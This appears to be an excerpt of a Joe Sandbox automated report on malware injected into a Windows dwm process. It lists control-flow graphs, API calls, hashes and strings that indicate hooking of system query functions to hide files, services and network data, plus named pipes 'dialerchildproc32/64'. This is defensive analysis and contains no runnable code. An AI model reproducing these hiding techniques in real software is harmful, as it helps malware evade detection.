                                                                                                                            control_flow_graph 265 1d15b05273c-1d15b0527a4 call 1d15b0529d4 * 4 274 1d15b0529b2 265->274 275 1d15b0527aa-1d15b0527ad 265->275 277 1d15b0529b4-1d15b0529d0 274->277 275->274 276 1d15b0527b3-1d15b0527b6 275->276 276->274 278 1d15b0527bc-1d15b0527bf 276->278 278->274 279 1d15b0527c5-1d15b0527e6 VirtualAlloc 278->279 279->274 280 1d15b0527ec-1d15b05280c 279->280 281 1d15b052838-1d15b05283f 280->281 282 1d15b05280e-1d15b052836 280->282 283 1d15b052845-1d15b052852 281->283 284 1d15b0528df-1d15b0528e6 281->284 282->281 282->282 283->284 287 1d15b052858-1d15b05286a LoadLibraryA 283->287 285 1d15b052992-1d15b0529b0 284->285 286 1d15b0528ec-1d15b052901 284->286 285->277 286->285 288 1d15b052907 286->288 289 1d15b0528ca-1d15b0528d2 287->289 290 1d15b05286c-1d15b052878 287->290 293 1d15b05290d-1d15b052921 288->293 289->287 291 1d15b0528d4-1d15b0528d9 289->291 294 1d15b0528c5-1d15b0528c8 290->294 291->284 296 1d15b052982-1d15b05298c 293->296 297 1d15b052923-1d15b052934 293->297 294->289 295 1d15b05287a-1d15b05287d 294->295 301 1d15b0528a7-1d15b0528b7 295->301 302 1d15b05287f-1d15b0528a5 295->302 296->285 296->293 299 1d15b052936-1d15b05293d 297->299 300 1d15b05293f-1d15b052943 297->300 303 1d15b052970-1d15b052980 299->303 304 1d15b052945-1d15b05294b 300->304 305 1d15b05294d-1d15b052951 300->305 306 1d15b0528ba-1d15b0528c1 301->306 302->306 303->296 303->297 304->303 308 1d15b052963-1d15b052967 305->308 309 1d15b052953-1d15b052961 305->309 306->294 308->303 310 1d15b052969-1d15b05296c 308->310 309->303 310->303
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocLibraryLoadVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3550616410-0
                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction ID: ec36fef82f7ded98fe8ced6437409f38e7e62c543dcb51e3e168834caca3b8b7
                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                            • Instruction Fuzzy Hash: AD610672B01694A7DB54CF95E2007BDB3B2FB95B94F588226DE5907BC8DA3CD852CB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 000001D15B081628: GetProcessHeap.KERNEL32 ref: 000001D15B081633
                                                                                                                              • Part of subcall function 000001D15B081628: HeapAlloc.KERNEL32 ref: 000001D15B081642
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0816B2
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0816DF
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0816F9
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081719
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B081734
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081754
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B08176F
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B08178F
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0817AA
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B0817CA
                                                                                                                            • Sleep.KERNEL32 ref: 000001D15B081AD7
                                                                                                                            • SleepEx.KERNELBASE ref: 000001D15B081ADD
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0817E5
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081805
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B081820
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B081840
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B08185B
                                                                                                                              • Part of subcall function 000001D15B081628: RegOpenKeyExW.ADVAPI32 ref: 000001D15B08187B
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B081896
                                                                                                                              • Part of subcall function 000001D15B081628: RegCloseKey.ADVAPI32 ref: 000001D15B0818A0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1534210851-0
                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction ID: 13fb83884ee3ddaaf7274ee5dc5e02d8c9ede86edda392f7dac3e843c5ce3e37
                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                            • Instruction Fuzzy Hash: 29312D31211641B1FB509BA2FB413E913B5BFCEBD0F245623AE09872A5FF28C6518A10

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 573 1d15b082b2c-1d15b082ba5 call 1d15b0a2ce0 576 1d15b082bab-1d15b082bb1 573->576 577 1d15b082ee0-1d15b082f03 573->577 576->577 578 1d15b082bb7-1d15b082bba 576->578 578->577 579 1d15b082bc0-1d15b082bc3 578->579 579->577 580 1d15b082bc9-1d15b082bd9 GetModuleHandleA 579->580 581 1d15b082bdb-1d15b082beb call 1d15b096090 580->581 582 1d15b082bed 580->582 584 1d15b082bf0-1d15b082c0e 581->584 582->584 584->577 587 1d15b082c14-1d15b082c33 StrCmpNIW 584->587 587->577 588 1d15b082c39-1d15b082c3d 587->588 588->577 589 1d15b082c43-1d15b082c4d 588->589 589->577 590 1d15b082c53-1d15b082c5a 589->590 590->577 591 1d15b082c60-1d15b082c73 590->591 592 1d15b082c83 591->592 593 1d15b082c75-1d15b082c81 591->593 594 1d15b082c86-1d15b082c8a 592->594 593->594 595 1d15b082c9a 594->595 596 1d15b082c8c-1d15b082c98 594->596 597 1d15b082c9d-1d15b082ca7 595->597 596->597 598 1d15b082d9d-1d15b082da1 597->598 599 1d15b082cad-1d15b082cb0 597->599 600 1d15b082ed2-1d15b082eda 598->600 601 1d15b082da7-1d15b082daa 598->601 602 1d15b082cc2-1d15b082ccc 599->602 603 1d15b082cb2-1d15b082cbf call 1d15b08199c 599->603 600->577 600->591 604 1d15b082dbb-1d15b082dc5 601->604 605 1d15b082dac-1d15b082db8 call 1d15b08199c 601->605 607 1d15b082cce-1d15b082cdb 602->607 608 1d15b082d00-1d15b082d0a 602->608 603->602 610 1d15b082df5-1d15b082df8 604->610 611 1d15b082dc7-1d15b082dd4 604->611 605->604 607->608 613 1d15b082cdd-1d15b082cea 607->613 614 1d15b082d3a-1d15b082d3d 608->614 615 1d15b082d0c-1d15b082d19 608->615 620 1d15b082dfa-1d15b082e03 call 1d15b081bbc 610->620 621 1d15b082e05-1d15b082e12 lstrlenW 610->621 611->610 619 1d15b082dd6-1d15b082de3 611->619 622 1d15b082ced-1d15b082cf3 613->622 617 1d15b082d4b-1d15b082d58 lstrlenW 614->617 618 1d15b082d3f-1d15b082d49 call 1d15b081bbc 614->618 615->614 623 1d15b082d1b-1d15b082d28 615->623 626 1d15b082d5a-1d15b082d64 617->626 627 1d15b082d7b-1d15b082d8d call 1d15b083844 617->627 618->617 631 1d15b082d93-1d15b082d98 618->631 628 1d15b082de6-1d15b082dec 619->628 620->621 638 1d15b082e4a-1d15b082e55 620->638 632 1d15b082e14-1d15b082e1e 621->632 633 1d15b082e35-1d15b082e3f call 1d15b083844 621->633 630 1d15b082cf9-1d15b082cfe 622->630 622->631 624 1d15b082d2b-1d15b082d31 623->624 624->631 634 1d15b082d33-1d15b082d38 624->634 626->627 637 1d15b082d66-1d15b082d79 call 1d15b08152c 626->637 627->631 642 1d15b082e42-1d15b082e44 627->642 628->638 639 1d15b082dee-1d15b082df3 628->639 630->608 630->622 631->642 632->633 643 1d15b082e20-1d15b082e33 call 1d15b08152c 632->643 633->642 634->614 634->624 637->627 637->631 646 1d15b082ecc-1d15b082ed0 638->646 647 1d15b082e57-1d15b082e5b 638->647 639->610 639->628 642->600 642->638 643->633 643->638 646->600 651 1d15b082e5d-1d15b082e61 647->651 652 1d15b082e63-1d15b082e7d call 1d15b0885c0 647->652 651->652 654 1d15b082e80-1d15b082e83 651->654 652->654 657 1d15b082e85-1d15b082ea3 call 1d15b0885c0 654->657 658 1d15b082ea6-1d15b082ea9 654->658 657->658 658->646 659 1d15b082eab-1d15b082ec9 call 1d15b0885c0 658->659 659->646
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction ID: 40a47e266584ab49a054c122320084e23a4604b79c508007c12dfca1d73e9c7a
                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                            • Instruction Fuzzy Hash: 6AB18B76210A50B2EB648FA5E6407E967B5FB86B84F045227FE0A53794DF38CE80CB40
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3140674995-0
                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction ID: 9fd4c6f4a9868c89008620f2ba4854625be88f1b43fa80de57712a9e1c296b75
                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                            • Instruction Fuzzy Hash: ED313072205B80A9EB609FA0F8907ED7375F785744F44452AEA4E57B98EF3CC648CB10
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1239891234-0
                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction ID: d475bc406b18891c6f55b59e54cc7d8a0552747163d67d503b6d1f93b9f01f25
                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                            • Instruction Fuzzy Hash: 4A312D32214B80A5DB608B65E9413EE73B4F78A794F50422AEA9D53B99DF38C656CB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction ID: fab350797a3e132e44a475c972967afaae47421dba3965977718ce1d959b3f36
                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                            • Instruction Fuzzy Hash: 5B513C36204B84A6EB54CFA2F64839A77B1F7CABD9F144226DA4A07768DF3CC145CB00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction ID: add11377254bc6963ce3acf859f52f56d2a54e07c526eebcf7fd9f76af8f1108
                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                            • Instruction Fuzzy Hash: 7D31837414094AF0EA45EBE5FB627E46331BBC6384F905723A819135769F7C878ACF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 415 1d15b056910-1d15b056916 416 1d15b056918-1d15b05691b 415->416 417 1d15b056951-1d15b05695b 415->417 419 1d15b056945-1d15b056984 call 1d15b056fc0 416->419 420 1d15b05691d-1d15b056920 416->420 418 1d15b056a78-1d15b056a8d 417->418 424 1d15b056a8f 418->424 425 1d15b056a9c-1d15b056ab6 call 1d15b056e54 418->425 438 1d15b056a52 419->438 439 1d15b05698a-1d15b05699f call 1d15b056e54 419->439 422 1d15b056938 __scrt_dllmain_crt_thread_attach 420->422 423 1d15b056922-1d15b056925 420->423 427 1d15b05693d-1d15b056944 422->427 429 1d15b056927-1d15b056930 423->429 430 1d15b056931-1d15b056936 call 1d15b056f04 423->430 431 1d15b056a91-1d15b056a9b 424->431 436 1d15b056ab8-1d15b056aed call 1d15b056f7c call 1d15b056e1c call 1d15b057318 call 1d15b057130 call 1d15b057154 call 1d15b056fac 425->436 437 1d15b056aef-1d15b056b20 call 1d15b057190 425->437 430->427 436->431 447 1d15b056b22-1d15b056b28 437->447 448 1d15b056b31-1d15b056b37 437->448 442 1d15b056a54-1d15b056a69 438->442 450 1d15b0569a5-1d15b0569b6 call 1d15b056ec4 439->450 451 1d15b056a6a-1d15b056a77 call 1d15b057190 439->451 447->448 452 1d15b056b2a-1d15b056b2c 447->452 453 1d15b056b7e-1d15b056b94 call 1d15b05268c 448->453 454 1d15b056b39-1d15b056b43 448->454 469 1d15b0569b8-1d15b0569dc call 1d15b0572dc call 1d15b056e0c call 1d15b056e38 call 1d15b05ac0c 450->469 470 1d15b056a07-1d15b056a11 call 1d15b057130 450->470 451->418 458 1d15b056c1f-1d15b056c2c 452->458 472 1d15b056b96-1d15b056b98 453->472 473 1d15b056bcc-1d15b056bce 453->473 459 1d15b056b45-1d15b056b4d 454->459 460 1d15b056b4f-1d15b056b5d call 1d15b065780 454->460 466 1d15b056b63-1d15b056b78 call 1d15b056910 459->466 460->466 482 1d15b056c15-1d15b056c1d 460->482 466->453 466->482 469->470 518 1d15b0569de-1d15b0569e5 __scrt_dllmain_after_initialize_c 469->518 470->438 491 1d15b056a13-1d15b056a1f call 1d15b057180 470->491 472->473 479 1d15b056b9a-1d15b056bbc call 1d15b05268c call 1d15b056a78 472->479 480 1d15b056bd5-1d15b056bea call 1d15b056910 473->480 481 1d15b056bd0-1d15b056bd3 473->481 479->473 512 1d15b056bbe-1d15b056bc6 call 1d15b065780 479->512 480->482 500 1d15b056bec-1d15b056bf6 480->500 481->480 481->482 482->458 502 1d15b056a45-1d15b056a50 491->502 503 1d15b056a21-1d15b056a2b call 1d15b057098 491->503 506 1d15b056bf8-1d15b056bff 500->506 507 1d15b056c01-1d15b056c11 call 1d15b065780 500->507 502->442 503->502 517 1d15b056a2d-1d15b056a3b 503->517 506->482 507->482 512->473 517->502 518->470 519 1d15b0569e7-1d15b056a04 call 1d15b05abc8 518->519 519->470
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction ID: 9899f0a63020608f8bd148cb1c60f5f97051fd4fc7a9ccd648660387e03fe635
                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                            • Instruction Fuzzy Hash: EC818D31700245B6FA54ABE5B6413E966B0BBC7780F5487279A4587FD6EF3CC8858F00

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetLastError.KERNEL32 ref: 000001D15B08CE37
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CE4C
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CE6D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CE9A
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CEAB
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CEBC
                                                                                                                            • SetLastError.KERNEL32 ref: 000001D15B08CED7
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF0D
                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,000001D15B08ECCC,?,?,?,?,000001D15B08BF9F,?,?,?,?,?,000001D15B087AB0), ref: 000001D15B08CF2C
                                                                                                                              • Part of subcall function 000001D15B08D6CC: HeapAlloc.KERNEL32 ref: 000001D15B08D721
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF54
                                                                                                                              • Part of subcall function 000001D15B08D744: HeapFree.KERNEL32 ref: 000001D15B08D75A
                                                                                                                              • Part of subcall function 000001D15B08D744: GetLastError.KERNEL32 ref: 000001D15B08D764
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF65
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000001D15B090A6B,?,?,?,000001D15B09045C,?,?,?,000001D15B08C84F), ref: 000001D15B08CF76
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 570795689-0
                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction ID: 9b750e709900db3f8b285b53116fd6575ddcb28fdcc9ce29755ace1c2dd3b0f1
                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                            • Instruction Fuzzy Hash: A141903020164475FA78A7F177523E922727FD77B0F244B26B936166E7EE6CC6218E00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction ID: 41706d217f2a720ae4aab521bad0f7ff9b88dcc047f0c6081fb2eadaeabb3915
                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                            • Instruction Fuzzy Hash: 5B210936614A40A2FB108B65F6543AA77B1F7CABE4F544316EA5903AA8DF7CC159CF00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352247572.000001D15B050000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001D15B050000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b050000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction ID: c9a44203c85b194ee5cd671319f3b60fad20d985c7369b2bd6b8861db9d1c30d
                                                                                                                            • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                                                            • Instruction Fuzzy Hash: 4DE17D72604740AAEF609FA5E6803ED7BB0F786798F101616EE8957F99CB38C491CF10
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                            • String ID: csm$csm$csm
                                                                                                                            • API String ID: 849930591-393685449
                                                                                                                            • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction ID: ea01caaa994d164788636285076b0a23ccf458b0f8d08db0ec26a99fbfa44400
                                                                                                                            • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                                                                                            • Instruction Fuzzy Hash: 14E17D73604B50BAEB209FA5E6803DD77B0F786798F101216EE8957B99CB3CD291CB40
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressFreeLibraryProc
                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                            • API String ID: 3013587201-537541572
                                                                                                                            • Opcode ID: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction ID: 8e71964b12e5497720adbb1a18e5f38c870111146b2f8171ee932e9e5d9738ee
                                                                                                                            • Opcode Fuzzy Hash: 978905767b5078ec9de210cf927baa423a0e9cdb829b06631a7440d3a6c0e710
                                                                                                                            • Instruction Fuzzy Hash: 9241C232311A0071EA16CBA6BA447D622B1B7C6BA0F595B27AD0D87795EF3CC5458B00
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_31_2_1d15b080000_dwm.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                            • String ID: d
                                                                                                                            • API String ID: 3743429067-2564639436
                                                                                                                            • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction ID: 2f97bd44212738b4f0fd68c0a3c83db76a186731d17fbb047330c0b4ac045da4
                                                                                                                            • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                            • Instruction Fuzzy Hash: 3C416033214B84E6EB61CF61E54439A77B1F789B98F548216EA8A07768DF3CC545CB40
                                                                                                                            APIs
                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D087
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0A6
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0CE
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0DF
                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000001D15B08C7DE,?,?,?,?,?,?,?,?,000001D15B08CF9D,?,?,00000001), ref: 000001D15B08D0F0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000001F.00000002.3352386697.000001D15B080000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D15B080000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
